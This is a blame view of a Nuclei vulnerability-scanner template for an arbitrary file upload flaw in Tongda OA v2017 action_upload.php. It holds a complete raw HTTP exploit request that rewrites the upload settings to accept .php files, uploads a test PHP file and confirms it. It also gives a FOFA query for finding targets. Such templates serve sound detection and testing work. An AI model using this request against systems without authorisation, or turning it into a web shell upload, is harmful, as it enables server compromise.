daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml

71 lines
2.5 KiB
YAML
Raw Normal View History

templates update -2
2023-09-14 19:11:38 +00:00
id: tongda-action-uploadfile
Added some Templates
2023-08-18 03:22:06 +00:00
info:
templates update -2
2023-09-14 19:11:38 +00:00
name: Tongda OA v2017 action_upload - Arbitrary File Upload
Added some Templates
2023-08-18 03:22:06 +00:00
author: SleepingBag945
severity: critical
Minor - Updates
2023-09-06 19:45:50 +00:00
description: |
Tongda OA v2017 action_upload.php file filtering is insufficient and does not require background permissions, resulting in arbitrary file upload vulnerabilities
Added some Templates
2023-08-18 03:22:06 +00:00
reference:
Minor - Updates
2023-09-06 19:45:50 +00:00
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20action_upload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
- https://github.com/shadow1ng/fscan/blob/main/WebScan/pocs/tongda-v2017-uploadfile.yml
Fix classification Fix classification
2024-09-10 09:08:16 +00:00
classification:
cpe: cpe:2.3:a:tongda2000:office_anywhere_2017:*:*:*:*:*:*:*:*
Minor - Updates
2023-09-06 19:45:50 +00:00
metadata:
TemplateMan Update [Mon Sep 18 12:45:28 UTC 2023] :robot:
2023-09-18 12:45:28 +00:00
verified: true
templateman update
2023-10-14 11:27:55 +00:00
max-request: 2
Add missing cpes Added missing cpes
2024-09-10 08:22:50 +00:00
vendor: tongda2000
Fix classification Fix classification
2024-09-10 09:08:16 +00:00
product: office_anywhere_2017
fofa-query: app="TDXK-通达OA"
updated templates
2023-09-17 16:11:07 +00:00
tags: tongda,fileupload,intrusive,router
templates update -2
2023-09-14 19:11:38 +00:00
variables:
updated php fileupload templates
2024-04-15 11:26:37 +00:00
string: "tongda-action-uploadfile"
Added some Templates
2023-08-18 03:22:06 +00:00
http:
- raw:
- |
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
ffff
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"
1000000000
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[filePathFormat]"
Minor - Updates
2023-09-06 19:45:50 +00:00
{{randstr}}
Added some Templates
2023-08-18 03:22:06 +00:00
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"
.php
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream
updated php fileupload templates
2024-04-15 11:26:37 +00:00
<?php echo md5("{{string}}");unlink(__FILE__);?>
Added some Templates
2023-08-18 03:22:06 +00:00
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="mufile"
submit
------WebKitFormBoundaryjhddzlqp--
- |
Minor - Updates
2023-09-06 19:45:50 +00:00
GET {{randstr}}.php HTTP/1.1
Added some Templates
2023-08-18 03:22:06 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
updated templates
2023-09-17 16:11:07 +00:00
part: body_2
Added some Templates
2023-08-18 03:22:06 +00:00
words:
updated php fileupload templates
2024-04-15 11:26:37 +00:00
- '{{md5(string)}}'
Minor - Updates
2023-09-06 19:45:50 +00:00
Added some Templates
2023-08-18 03:22:06 +00:00
- type: status
status:
templateman update
2023-10-14 11:27:55 +00:00
- 200
chore: sign templates 🤖
2024-09-12 05:14:01 +00:00
# digest: 4a0a00473045022071fe9fabdbc8d1c16889a2f4a0b86748a9fde84f3d05da3c5b9236b12e4e9a92022100ff3f9b41d6ae10046f6a20d020c9c544bce7206084911692cfbe47cbeb8e0151:922c64590222798bb761d5b6d8e72950